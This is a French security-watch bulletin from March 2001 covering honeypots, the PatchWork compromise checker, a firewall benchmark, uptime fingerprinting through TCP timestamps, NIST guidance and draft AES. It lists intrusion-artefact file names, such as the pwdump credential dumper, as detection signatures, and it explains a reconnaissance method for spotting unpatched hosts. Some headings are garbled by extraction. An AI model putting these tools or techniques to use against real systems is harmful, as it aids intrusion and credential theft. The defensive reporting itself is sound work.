Veille Technologique Sécurité

Transcription

Veille Technologique Sécurité
APOGEE Communications
R
dee
orrtt d
po
pp
Raap
Veille Technologique Sécurité
N
2
32
N°°3
Mars 2001
Les informations fournies dans ce document ont été collectées et compilées à partir de
sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites
Web, ...
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains
thèmes sont validées à la date de la rédaction du document.
Les symboles d’avertissement suivants seront éventuellement utilisés:
Site dont la consultation est susceptible de générer directement ou indirectement,
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur
le système d’information associé.
Site susceptible d’héberger des informations ou des programmes dont l’utilisation
est répréhensible au titre de la Loi Française.
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la
qualité des applets et autres ressources présentées au navigateur WEB.
LLaa ddiiffffuussiioonn ddee ccee ddooccuum
meenntt eesstt rreessttrreeiinnttee aauuxx
cclliieennttss ddeess sseerrvviicceess
V
VTTS
S--R
RA
APPPPO
OR
RTT eett V
VTTS
S__EEN
NTTR
REEPPR
RIIS
SEE
Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs.
APOGEE Communications
1, Rue Jean Rostand
91893 ORSAY CEDEX
Pour tous renseignements
Offre de veille:
http://www.apogee-com.fr/veille
Informations:
[email protected]
© APOGEE Communications - Tous droits réservés
Mars 2001
Au sommaire de ce rapport …
PRODUITS ET TECHNOLOGIES
LES PRODUITS
5
5
AUDIT ET CONTRÔLE
5
SPECTER 5.0
PATCHWORK 1.1
5
5
PARE FEUX
7
COMPARATIF
LES TECHNOLOGIES
7
8
SYSTÈMES D'EXPLOITATION
8
NETCRAFT
8
INFORMATIONS ET LÉGISLATION
LES INFORMATIONS
10
10
GUIDES
10
ENGINEERING PRINCIPLES FOR IT SECURITY
GUIDANCE DOCUMENT ON IDS
CRYPTOGRAPHIE
AES
10
11
11
11
AUDIT ET CONTRÔLE
12
ISO17799 - COBRA
12
LOGICIELS LIBRES
LES SERVICES DE BASE
LES OUTILS
14
14
14
NORMES ET STANDARDS
LES PUBLICATIONS DE L'IETF
16
16
LES
LES
RFC
DRAFTS
16
16
NOS COMMENTAIRES
24
LES RFC
24
RFC 3067
24
LES DRAFTS
24
DRAFT-COFFEYSTRAIN-DNSEXT-PRIVATEDNSTLD-00
DRAFT-ESIBOV-DNSOP-SUPPRESS-QUERIES-00
DRAFT-IETF-DNSEXT-OBSOLETE-IQUERY-00
ALERTES ET ATTAQUES
ALERTES
GUIDE DE LECTURE
FORMAT DE LA PRÉSENTATION
SYNTHÈSE MENSUELLE
ALERTES DÉTAILLÉES
AVIS OFFICIELS
CIAC
CISCO
COMPAQ
FREEBSD
HP
IBM
IMAPD
ISS
LINUX
LINUX CALDERA
LINUX DEBIAN
LINUX REDHAT
LINUX SUSE
MICROSOFT
MICROSOFT / NIPC
MIT/KERBEROS
NETSCAPE
NORTEL
OPENBSD
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
24
25
25
26
26
26
27
27
28
28
28
28
28
29
29
30
30
30
30
31
31
31
31
31
32
32
32
32
32
Page 2/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
PALM OS
SSH
VIRUS / VERS
ZOPE
33
33
33
33
ALERTES NON CONFIRMÉES
33
CGI/PERL
DGUX
FTP
MICROSOFT
NETSCAPE
MYSQL
NOVELL
QUALCOMM
SUN
33
33
34
34
34
34
34
34
34
AUTRES INFORMATIONS
35
REPRISES D'AVIS
35
ET
CORRECTIFS
CIAC
COMPAQ
FREEBSD
HP
LOTUS/IBM
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
LINUX SUSE
NETBSD
PGPI
TIS
VIRUS
35
36
36
36
36
36
36
37
37
37
37
37
38
CODES D'EXPLOITATION
38
BULLETINS ET NOTES
38
ATSTAKE
38
AUSCERT
AXENT
CERT
ISS
NIPC
SYMANTEC
38
38
38
38
39
39
ATTAQUES
40
OUTILS
40
TECHNIQUES
48
SUBSEVEN V2.2 VBS WORM GENERATOR CHKROOTKIT
TRIANGLE BOY DÉVOILÉ
40
42
45
46
LUCKROOT - HONEYNET SCAN OF THE MONTH
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
48
Page 3/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
Le mot de la rédaction …
Une part importante de ce rapport de veille est consacrée aux attaques et outils
associés, conséquence directe d'une actualité riche en événements:
-
diffusion du virus Anna Kournikova (CERT CA-2001-03),
-
nouvelle version de SubSeven (X-Force #73),
-
nombre grandissant d'attaques visant à prendre le contrôle de systèmes
LINUX au moyen de code mobiles tels Ramen (CERT IN-2001-01) ou encore
LION (NIPC 01-005).
Autre fait marquant, l'activité de normalisation semble avoir atteint sa vitesse
de croisière dans les instances américaines avec la publication de 3 documents1
par le NIST dont la version de travail du standard AES et la diffusion de 25
nouveaux drafts IETF ayant directement trait à la sécurité. Mais, dans le même
laps de temps, seuls 3 RFC portant sur la sécurité ont été publiés !
L'équipe de Veille Technologique
1
Ce chiffre s'élève à 6 documents au jour de la diffusion du présent Rapport.
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 4/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
PR
RO
OD
DU
UIIT
TS
SE
ET
T TE
EC
CH
HN
NO
OL
LO
OG
GIIE
ES
S
LES
PRODUITS
AUDIT ET CONTROLE
SPECTER 5.0
Description
Parmi toutes les techniques utilisées dans le domaine de la détection d'intrusion, la technique 'proactive' consistant à
délibérément installer un système piégé, ou 'Honey Pot', était restée jusqu'à maintenant l'apanage des laboratoires privés ou gouvernementaux - travaillant dans le domaine de l'analyse des attaques.
Historiquement développé par Clifford Stoll en 1988 lors de sa traque contre le CCC allemand (aventure relatée
dans l'excellent ouvrage 'The Cuckoo's Egg') puis mis en pratique en 1991 par B.Cheswick et S.Bellovin avec leur
système de prison virtuelle chez ATT (une autre aventure à lire dans 'An Evening with Berferd'), le système piégé
permet d'étudier sans aucun risque non seulement les différentes attaques susceptibles d'être perpétrées contre un
système mais aussi l'évolution et l'adaptation du comportement du pirate face à un problème donné et modifiable à
volonté … l'observation d'un pirate à travers une glace sans tain …
Se positionnant en concurrent de l'outil libre Deception ToolKit ('F.Cohen') et du produit commercial Cybercop
Sting ('NAI/Pgp'), le produit SPECTER V5.0 est développé par la société Suisse NETSEC.
Fonctionnant en environnement Windows NT
ou 2000, SPECTER est capable de simuler le
fonctionnement de 13 services - dont 3
chevaux de Troie et 7 services piégés - sur
11 plates-formes différentes:
Services émulés: Systèmes émulés:
SMTP
Windows 98
FTP
Windows NT
TELNET
Windows 2000
FINGER
Linux
POP3
Solaris
IMAP4
Unix Tru64
HTTP
NeXTStep
DNS
Irix
SUN RPC
Unisys Unix
SNMP TRAP
Aix
NETBUS
MacOS
SUB SEVEN
BO2K
Plusieurs options de configuration permettent d'adapter l'émulation au contexte d'analyse souhaité:
Qualité de la configuration du système d'exploitation selon 5 niveaux,
Qualité des mots de passe contenus dans les fichiers servis à l'attaquant selon 7 niveaux représentatifs.
Le produit offre la possibilité de capturer, dans des conditions de déclenchement hélas non documentées, diverses
informations permettant d'identifier l'agresseur: bannières SMTP, Telnet, Ftp, Http, Sondage de port et TraceRoute.
En l'absence de versions de démonstration ou d'évaluation, il ne nous a pas été possible de valider les fonctionnalités
de ce produit d'un coût restant abordable -$899- et fort prometteur si l'on se réfère aux données techniques fournies.
Complément d’information
http://www.specter.com
PATCHWORK 1.1
Description
Mi-mars, les principaux organismes d'alerte Américains révèlent l'existence d'une attaque menée sur le long terme par
une organisation de pirates localisée en Europe de l'Est. Depuis maintenant plus d'un an, cette organisation aurait
systématiquement sondé les serveurs hébergeant un site de commerce électronique dans le seul but d'acquérir les
informations concernant les clients, dont bien entendu, les données bancaires personnelles. Les derniers chiffres
annoncés font état du pillage d'une quarantaine de sites, pillage ayant permis de collecter plus d'un million de numéro
de cartes bancaires.
Une telle attaque a été rendue possible par la négligence des exploitants des serveurs fonctionnant en environnement
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 5/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
NT4.0 / SQL Server / IIS, la majorité de ces serveurs n'ayant fait l'objet d'aucune mise à jour malgré les
avertissements répétés des centres d'alertes mondiaux. Ainsi, quatre vulnérabilités, dont la plus ancienne a été
découverte en Novembre 99, ont été exploitées pour prendre le contrôle des bases de données des sites attaqués.
Afin d'éradiquer au plus vite ce problème endémique, le SANS
Institute a annoncé la mise à disposition d'un outil de test
normalement réservé aux membres du CIS (Center for
Internet Security) et dénommé PatchWork.
Présenté par son auteur Steve Gibson sous l'intitulé 'The
Tool to Test For Windows NT Vulnerabilities Used By
Russian Hackers' pouvant porter à confusion (les hackers
Russes ont-ils utilisé l'outil ou simplement exploité les
vulnérabilités ?), Patchwork 1.1 prend la forme d'un
exécutable WIN32 de faible volume (30ko).
Notons, la chose est encore suffisamment rare pour quelle
mérite d'être signalée, que cet exécutable est signé par un
certificat émis par Verisign, certificat qui n'est hélas révélé
qu'à la condition d'accepter d'exécuter le programme à partir
d'un navigateur.
Dés son lancement, et sans en informer l'utilisateur, cet utilitaire
engage une première phase d'analyse du système durant laquelle
la vulnérabilité potentielle du système est vérifiée.
Cette phase a pour objectif de déterminer si les correctifs
correspondants aux vulnérabilités exploitées ont été mis en
place:
- MS99-025: Unauthorized Access to IIS Servers through
Open Database Connectivity (ODBC) Data
Access with Remote Data Service (RDS)
- MS00-008: Registry Permissions Vulnerability
- MS00-014: SQL Query Abuse Vulnerability
- MS00-086: Web Server File Request Parsing
L'utilisateur est averti du bon fonctionnement de l'utilitaire par
l'apparition d'une fenêtre l'informant des résultats de l'analyse.
La seconde phase d'analyse doit alors être explicitement
initialisée par l'utilisateur. Elle permet de vérifier que le système
n'a pas été compromis par la vague d'attaque.
Les volumes logiques du système sont balayés, répertoire par
répertoire, afin de rechercher la présence des fichiers installés ou
modifiés lors de l'attaque. La 'signature' actuellement utilisée est
constituée de deux listes de noms de fichiers:
- Fichiers directement liés à cette attaque: ntalert.exe,
sysloged.exe, tapi.exe 20.exe, 21.exe, 25.exe, 80.exe,
139.exe, 1433.exe, 1520.exe, 26405.exe, i.exe
- Fichiers souvent installés après une attaque: omscan.exe,
mslom.exe, lsaprivs.exe, pwdump.exe, serv.exe, smmsniff.exe
Bien que le rôle exact des exécutables de la première liste ne soit
pas documenté, les noms 'numériques' attribués à certains
d'entre eux laissent supposer qu'il puisse s'agir de proxies
interceptants les flux échangés sur les ports de même nom:
20: FTP (Data)
- 25:SMTP
- 139 : SESSION (NetBios) 1520 : Atm Zip !
21: FTP (Commandes) - 80:WEB
- 1433 : SQL-Server
- 26405 : Non répertorié
L'avantage majeur de cet utilitaire est d'automatiser la phase de prévention (vérification de la configuration) et de
diagnostic (recherche des traces de compromissions) bien qu'aucune option de mise à jour des signatures ne soit
présente.
On notera, pour l'anecdote, le style caractéristique de Steve Gibson qui peut hélas porter préjudice à la crédibilité
d'initiatives pourtant louables. Ainsi, et à titre d'exemple, le faible volume (30Ko) revendiqué par S.Gibson comme
résultant uniquement d'un programme qui 'was hand crafted -- byte by byte -- in 100% pure 32-bit Intel assembly language' - cf
l'onglet 'HELP' de l'utilitaire - doit aussi être mis au crédit de la compression préalable de l'exécutable (d'un volume
initiale 110Ko). Dans un domaine aussi critique que celui de la détection d'une compromission, domaine pour lequel la
plus grande réactivité est attendue, optimiser un programme à l'octet près s'apparente à une perte de temps
inadmissible. Le style de l'écriture importe peu lorsqu'il s'agit de diffuser au plus vite un outil d'aide quand bien même
celui-ci serait écrit en shell, perl ou même visual script !
Complément d'information
http://www.sans.org/newlook/alerts/NTE-bank.htm
http://www.cisecurity.org/tools/patchwrk.exe
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 6/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
http://grc.com/pw/patchwork.htm
PARE FEUX
COMPARATIF
Description
Le groupement 'Network World' a publié les résultats d'un banc d'essai destiné à analyser le
comportement des produits de type 'pare-feux' récents sur un réseau à très haut débit. Afin de
conserver un périmètre matériel raisonnable, seuls les produits coûtant moins de $20000 ont été
retenus. Network World annonce avoir soumis ces produits à 21 tests différents sur une plateforme constituée de plusieurs switchs, d'un PC PIII bi-processeur cadencé à 650Mhz et de divers
logiciels dont la suite SmartFlow et SmartTCP de la société Spirent.
Ont été testés les produits suivants, classés par ordre alphabétique sur le champ fournisseur:
(A) NETWORK ASSOCIATES
PIX525
(A) CISCO
WebShield(1)
BorderManager (L) NOVELL
Firewall-1
(L) CHECKPOINT
IP650
(A) NOKIA
ETrust
(F) COMPUTER ASSOCIATES
SideWinder
(L) SECURE COMPUTING
KnightStar
(A) CYBERGUARD
SonicWall ProVX (A) SONICWALL
Enternet
(A) ENTERNET
Raptor
(L) SYMANTEC
Brick
(A) LUCENT
AppSwitch3500 (A) TOPLAYER
NetScreen-100 (A) NETSCREEN
FireBox II
(A) WATCHGUARD
CyberWallPlus (A) NETWORK-1
(1):
la gamme de produit a été dernièrement renommée en PGP e-ppliance
Nota: un click sur le nom du produit permet d'accéder directement à la page de présentation sur le site de l'éditeur.
L'article publié reste hélas très évasif sur les caractéristiques exactes de certains produits pour lesquels plusieurs
versions, voire plusieurs plates-formes matérielles, peuvent être sélectionnées. Afin de faciliter la comparaison, la
liste précédente précise la catégorie de rattachement de chaque produit au moyen d'une lettre:
- Lettre A: Produit logiciel embarqué, optimisé et préconfiguré (dénommé 'Appliance' par la majorité des éditeurs)
- Lettre L: Produit purement logiciel
- Lettre F: Produit inscrit dans une famille de produits
Cette classification, non utilisée dans l'article original, apporte un éclairage particulier sur la sélection effectuée (et
incidemment sur le marché actuel): 10 produits sur les 16 testés sont des appliances. Ce constat, corrélé avec les
résultats de l'étude, démontre - et cela n'est pas une nouveauté - que les meilleurs performances sont atteintes
lorsque le matériel est optimisé pour les fonctions attendues, cas typique des appliances.
Sans reprendre en détail les résultats de l'étude (le lecteur se reportera à l'article original) il est intéressant de mettre
en évidence les produits classés parmi les 6 premiers sur les 3 catégories de test retenues:
Débit
Nb de
Pic de
Moyenne
Brut
Connexions
charge
non pond.
Nom
NetScreen
3
1
4
2,7
Cisco
5
3
1
3,0
Cyberguard
6
5
2
4,3
TopLayer
1
2
11
4,7
Nokia
2
9
5
5,3
Enternet
7
4
7
6,0
Lucent
4
7
10
7,0
Checkpoint
10
10
3
7,7
Watchguard
9
6
8
7,7
Network Assoc.
11
14
6
10,3
Secure Comp.
8
15
9
10,6
SonicWall
12
11
12
11,6
Comp. Assoc.
14
8
14
12
Novell
15
12
15
14
Symantec
13
16
13
14
NetWork-1
16
13
16
15
Rappelons que les tests auxquels les produits ont été soumis avaient pour objectif de comparer les performances en
terme de débit et de charge supportée sans préjuger de la qualité de la protection et du niveau de sécurité offert.
Complément d’information
http://www.idg.net/ic_473844_1794_9-10000.html
http://www.spirentcom.com/smartbits/solutions/software.asp
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 7/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
LES
TECHNOLOGIES
SYSTEMES D'EXPLOITATION
NETCRAFT
Description
Le site 'NetCraft', établi depuis 1999, s'est spécialisé dans la surveillance et l'analyse de la qualité de service de tout
type de site WEB. Annonçant une base contenant les statistiques de plus de 27 Millions de sites, NetCraft n'a jamais
réellement dévoilé les techniques d'acquisition non intrusives utilisées pour établir la durée de fonctionnement sans
interruption (ou plus simplement Uptime dans le jargon informatique) des systèmes surveillés.
Un article publié dans la liste Bugtraq propose une explication plausible basée sur l'exploitation des informations
liées à l'option TCP 'Timestamp' décrite dans le RFC 1323 'TCP Extensions for High Performance'. Ce RFC
décrits deux nouveaux mécanismes permettant de résoudre le problème posé par l'utilisation du protocole TCP sur
des liaisons à très hauts débits, les mécanismes initiaux de gestion des flux et de retransmission devenant inefficaces
lorsque les débits atteignent le gigabit.
Deux nouveaux champs optionnels exploitables au niveau TCP ont ainsi été définis, le premier dit 'WSopt' (TCP
Windows Scale Option) permettant d'augmenter la taille de la fenêtre d'acquittement, le second dit 'TSopt' (TCP
Timestamps Option) permettant d'affiner la gestion des temps de transits (RTT). Cette dernière option consiste à
transmettre un horodatage dans chaque segment transmis, le destinataire renvoyant la valeur reçue dans chaque
paquet d'acquittement ACK. Un calcul simple permet alors à chacun de connaître le temps de transit moyen.
La stratégie de génération de l'horodatage n'est pas explicitement spécifiée par le RFC qui précise seulement:
The timestamp value to be sent in TSval is to be obtained from a (virtual) clock that we call the "timestamp clock".
Its values must be at least approximately proportional to real time, in order to measure actual RTT.
Dans ces conditions, de nombreuses implémentations
utilisent un compteur remis à zéro lors du démarrage du
système et incrémenté à une fréquence multiple de la
précision requise pour le calcul du temps de transit.
La valeur transmise est alors proportionnelle à la durée
écoulée depuis la dernière initialisation quant elle n'est pas,
pour certains systèmes, identique à cette durée exprimée
en 'ms'.
L'échantillonnage de cette valeur à intervalles réguliers
permettra donc d'interpoler une courbe (en pratique une
droite) dont l'origine déterminera la date de la dernière
réinitialisation du système.
Notons sur le tableau suivant la remarquable similitude entre les résultats de l'étude de Bret McDanel et la liste des
systèmes fournissant une information fiable proposée par NetCraft, similitude qui tendrait à prouver que les
données transmises via l'option TimeStamp TCP sont bien exploitées par NetCraft.
Informations en provenance de NetCraft
AIX
AmigaOS
AS/400
BSD/OS
CISCO
CONVEX
DG/UX
FreeBSD
HP-UX
IRIX
Linux 2.1
MacOS
MaxOSX
NetBSD
NetWare
New-OS
NT3
NT4
OpenBSD
OS/2
OS/390
SCO Unix
Solaris
NON
NON
NON
OUI
N/A
N/A
NON
OUI Config. spécifique version 3 et plus
OUI Versions récentes
OUI
OUI Kernel 2.1 et suivants sauf sur alpha
NON
OUI
OUI Versions récentes
NON
NON
NON
OUI Jusqu'au SP3
OUI Versions récentes
NON
NON
NON
OUI Solaris 2.6 et suivant
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Etude de Bret McDanel
OUI
N/A
N/A
OUI
OUI
OUI
N/A
OUI
OUI
OUI
OUI
OUI
N/A
N/A
NON
N/A
NON
NON
OUI
N/A
N/A
N/A
OUI
Config. Spécifique
Version 11.0
2.1.15
Config. Spécifique version 9.x
Config. Spécifique version 5.3 et plus
Kernel 2.1 et suivant
Versions 2.1 et 3.0
Solaris 2.6 et suivant
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Page 8/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
SUNOS4
True64
VM
W2K
W95
NON
NON
NON
OUI
NON
Windows 2000
NON
NON
N/A
OUI
NON
24
25
26
27
28
Cependant et de notre point de vue, l'information fournie dans l'option TimeStamp TCP, ne peut, seule, expliquer la
justesse constatée des analyses. La précision atteinte doit probablement résulter de l'utilisation de multiples sources
d'information, sélectionnées et corrélées en tenant compte du type de système d'exploitation sous-jacent.
Ce technique d'acquisition non intrusive du temps de fonctionnement est exploitée par le fameux utilitaire de sondage
'nmap' dans version 2.54b22 pour déterminer la stabilité du système cible. En considérant qu'un système doit être
réinitialisé lors de chaque mise à jour majeur - passage d'un correctif système par exemple - cette information
permet éventuellement d'affiner l'identification des systèmes potentiellement vulnérables !
Complément d’information
http://www.netcraft.com
http://www.securityfocus.com/archive/1/168637
ftp://fto.isi.edu/in-notes/rfc1323.txt
http://www.insecure.org/nmap/
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 9/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
IN
NF
FO
OR
RM
MA
AT
TIIO
ON
NS
SE
ET
T LE
EG
GIIS
SL
LA
AT
TIIO
ON
N
LES
INFORMATIONS
GUIDES
ENGINEERING PRINCIPLES FOR IT SECURITY
Description
Intitulé Engineering Principles for Information Technology Security , ou EPITS, cette ébauche de standard de 27
pages publiée par le NIST se propose d'établir les principes élémentaires applicables à la conception de systèmes
sécurisés.
S'appuyant sur les 8 principes et 14 procédures d'organisation décrits dans le standard SP800-14 'Generally
Accepted Principles and Practices for Securing Information Technology Systems', l'EPITS spécifie 32
principes techniques en tenant compte de la stratégie de protection en profondeur, ou Defense-in-depth, élaborée
par le DoD.
Chaque principe est positionné sur les 5 phases du cycle de vie d'un système:
le démarrage
(initiation),
le développement
(development/acquisition),
le déploiement
(implement),
l'exploitation
(operational/maintenance),
la destruction
(disposal).
La lecture de ce 'Guide' est fortement conseillée, les 32 principes étant simples (pour ne pas dire évidents mais n'est
ce pas là une preuve de la qualité du travail effectué ?), efficaces et parfaitement adaptés à la gestion de la sécurité
d'un système d'information 'civil'.
1. Establish a sound security policy as the “foundation” for design
2. Clearly delineate the physical and logical security boundaries governed by associated security policies.
3. Reduce risk to an acceptable level.
4. Assume that external systems are insecure.
5. Identify potential trade-offs between reducing risk
6. Ensure no single point of failure.
7. Implement tailored system security measures to meet organizational security goals.
8. Design and implement security measures to be proportional to the program risks and mission impact.
9. Strive for simplicity.
10. Design and operate an IT system to prevent vulnerability and to be resilient in response.
11. Treat security as an integral part of the overall system design.
12. Minimize the system elements to be trusted.
13. Implement security through a combination of measures distributed physically and logically.
14. Provide assurance that the system is, and continues to be, resilient in the face of expected threats.
15. Isolate system elements to limit or contain vulnerabilities.
16. Formulate security measures to address multiple overlapping information domains.
17. Isolate public access systems from mission critical resources (e.g., data, processes, etc).
18. Use boundary mechanisms to separate computing systems and network infrastructures.
19. Where possible, base security on open standards for portability and interoperability.
20. Implement and employ layered protections to mitigate vulnerabilities in COTS products.
21. Use common language in developing security requirements.
22. Design and implement audit mechanisms to detect unauthorized use and to support incident investigations.
23. Design security to allow for regular adoption of new tech. , including a secure & logical tech. upgrade process.
24. Authenticate users and processes to ensure appropriate access control decisions are made across domains.
25. Use unique identities to ensure accountability.
26. Use roles to control user and process access.
27. Maintain traceability from security goals and requirements to security mechanisms.
28. Ensure the integrity, confidentiality, and availability of information being processed, in transit, and in storage.
29. Strive for operational ease of use
30. Develop and exercise contingency or disaster recovery procedures to ensure appropriate availability.
31. Consider custom products to achieve adequate security.
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 10/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
32. Ensure proper security in the shutdown or disposal of a system.
Le NIST informe les lecteurs que tout commentaire permettant de faire évoluer ce document sera le bienvenu.
Complément d’information
http://csrc.nist.gov/publications/drafts.html
GUIDANCE DOCUMENT ON IDS
Description
Avec ce document de travail de 51 pages dénommé 'Guidance Document on Intrusion Detection Systems', le
NIST nous prouve l'excellence et la qualité de ses publications. Destiné à accompagner les agences Fédérales
Américaines dans leur travail quotidien d'investigation, ce Guide propose un état de l'art irréprochable des systèmes
dits de 'détection d'intrusion'.
Le sommaire de ce document est reproduit ci-après:
1. Introduction
2. Overview of Intrusion Detection Systems
2.1. What is intrusion detection?
2.2. Why should I use Intrusion Detection Systems?
2.3. Major types of IDSs
2.4. Tools that Complement IDSs
3. Advice on selecting IDS products
3.1. Technical and Policy Considerations
3.3. IDS Product Features and Quality
4. Deploying IDSs
4.1. Deployment strategy for IDSs
4.2. Deploying Network-Based IDSs
4.3. Deploying Host-Based IDSs
4.4. Alarm strategies
5. Strengths and Limitations of IDSs
5.1. Strengths of Intrusion Detection Systems
5.2. Limitations of Intrusion Detection Systems
6. Advice on dealing with IDS output
6.1. Typical IDS Output
6.2. Handling Attacks
7. Computer Attacks and Vulnerabilities
7.1. Attack Types
7.2. Types of Computer Attacks Commonly Detected by IDSs
7.3. Types of Computer Vulnerabilities
8. The Future of IDSs
9. Conclusion
Appendix A - Frequently Asked Questions about IDSs
Appendix B - IDS resources
La lecture de ce Guide par les responsables techniques en charge de la gestion des incidents est fortement
recommandée. Notons que les chapitres '2.3 - Major Types of IDSs', '4.2 - Deployement Strategy for IDSs' et '5
- Strengths and Limitations of IDSs' traitent de questions couramment soulevées dans ce domaine.
Le seul regret que nous ayons à formuler concerne l'absence de règles, ou de principes de sélection directement
applicables. Ainsi, si les avantages/inconvénients liés au positionnement d'une sonde IDS autour d'un Pare-feu sont
correctement présentés, aucune règle concrète d'architecture et de sélection de l'une ou l'autre des options n'est
proposée.
Complément d’information
http://csrc.nist.gov/publications/drafts.html
http://csrc.nist.gov/publications/drafts/idsdraft.pdf
CRYPTOGRAPHIE
AES
Description
Le draft de la norme FIPS portant sur l'algorithme AES - le successeur du DES - a fait l'objet d'un appel à
commentaires par le NIST pour une période de 90 jours se terminant le 29 Mars. A l'issue de cette période, le
document de travail sera éventuellement revu avant d'être amendé puis promulgué au niveau de Federal
Information Processing Standard. Le NIST espère finaliser ce processus pour l'été 2001.
Le document de travail publié, intitulé 'Draft FIPS for the AES', commence par rappeler la terminologie, les
conventions de notation et les principes mathématiques nécessaires à la compréhension de la description de
l'algorithme. La spécification de l'algorithme est ensuite abordée en détaillant les fonctions de chiffrement, de
déchiffrement et d'expansion de clef. Les points spécifiques liés à l'implémentation sont ensuite traités, le document
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 11/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
se terminant par une annexe contenant divers vecteurs de tests.
Dans l'état actuel du processus de normalisation, l'AES est décrit comme un algorithme de chiffrement par blocs de
128 bits susceptible d'utiliser une clef secrète de longueur comprise entre 128 et 256 bits. En pratique, et afin de
faciliter l'inter-opérabilité, trois longueur de clefs ont été retenues qui permettent de définir trois combinaisons
normalisées:
- AES-128 (clef de 128 bits),
- AES-192 (clef de 192 bits) et
- AES-256 (clef de 256 bits).
Pour prétendre être conforme au standard FIPS-AES, une implémentation devra supporter au moins l'une de ces
combinaisons.
En pratique, l'association de ces 3 combinaisons avec les quatre modes d'utilisation classiques d'un algorithme de
chiffrement par bloc - OFB, CBC, OFB et CFB - conduit à définir et enregistrer les 12 identifiants d'objet (ou OID)
suivants:
- aes1
AES-128 mode ECB
- aes21
AES-192 mode ECB
- aes41
AES-256 mode ECB
- aes2
AES-128 mode CBC
- aes22
AES-192 mode CBC
- aes42
AES-256 mode CBC
- aes3
AES-128 mode OFB
- aes23
AES-192 mode OFB
- aes43
AES-256 mode OFB
- aes4
AES-128 mode CFB
- aes24
AES-192 mode CFB
- aes44
AES-256 mode CFB
IN i
AES
AES
OUT i
ECB
Electronic Code Book
IN i
OUT i-1
IN i+1
AES
AES
OUT i
CBC
Cipher Book Chaining
IN i
OUT i
k
CFB
Cipher Feedback Block
AES
AES
IN i
OUT i
k
OFB
Ouput Feedback Block
AES
AES
Complément d’information
http://csrc.nist.gov/publications/drafts.html
AUDIT ET CONTROLE
ISO17799 - COBRA
Description
La passage tant attendu de la norme Anglaise BS7799 'Code of practice for information security management'
en Norme Internationale ISO17799 s'est accompagné d'une soudaine activité tant dans le domaine du logiciel que
celui du conseil et des portails WEB !
Ainsi, l'éditeur spécialisé 'CA-Systems' annonce la
disponibilité d'une base de connaissances conforme
ISO17799 et exploitable par son logiciel d'aide à
l'analyse de risque 'COBRA' (un paquetage de 15Mo).
Présenté comme un outil exploitable sans aucune
connaissance ou formation préalable, la version 3 de
COBRA prend la forme d'une interface graphique
générique et d'un ensemble de bases de connaissances
formant le cœur de la méthodologie. Celle-ci utilise un
formalisme de type QCM, les questions étant dictées par
le type d'analyse sélectionnée.
Chaque base de connaissance est constituée de plusieurs
modules correspondants à différents thèmes d'analyse et
pouvant être sélectionnés indépendamment.
Si nécessaire, un questionnaire spécifique pourra être
créé par sélection de tout ou partie des modules contenus
dans les différentes bases de connaissance.
Une analyse de risque est conduite en trois étapes successives:
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 12/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
1.
Initialisation: l'auditeur sélectionne le type d'analyse et créé
un dossier référencé par une description textuelle et un
identifiant unique. L'état d'avancement de chaque dossier est
conservé permettant ainsi l'arrêt et la reprise d'une analyse.
2. Traitement: l'intervenant sélectionne un module, indique sa
qualité et son nom. Il peut ensuite engager la phase de
renseignement des différentes rubriques sous la forme de
questions/réponses uniques ou à choix multiples. Les
questions ouvertes ne sont pas supportées car ne permettant
pas l'automatisation de l'analyse.
Cette étape sera finalisée lorsque tous les modules
sélectionnés pour le dossier auront été complétés.
La présence d'une fonction de saisie assistée des réponses
facilite notablement le déroulement des entretiens. Bien
entendu, le(s) questionnaire(s) peu(ven)t être imprimé(s)
autorisant ainsi un traitement en temps différé.
3. Synthèse:
l'intervenant
sélectionne
les
options
de
présentation et génère un rapport qui peut ensuite être
imprimé.
Un outil complémentaire, Module Manager (paquetage de 5Mo), autorise la création, la modification et même la
traduction de modules, permettant ainsi l'utilisation de COBRA dans un environnement spécifique.
COBRA Professionnel est livré avec 5 bases de connaissances couvrant les principaux domaines de l'analyse de
risque appliquée aux Systèmes d'Information, d'autres bases spécialisées pouvant être acquises (Business Continuity,
Data Protection Legislation, …):
ISO17799
(Environnement 'BS7799')
e-Commerce Infrastructure (Environnement 'Risk Consultant')
IT Security
(Environnement 'Risk Consultant')
Operational Risk
(Environnement 'Risk Consultant')
Quick Risk
(Environnement 'Risk Consultant')
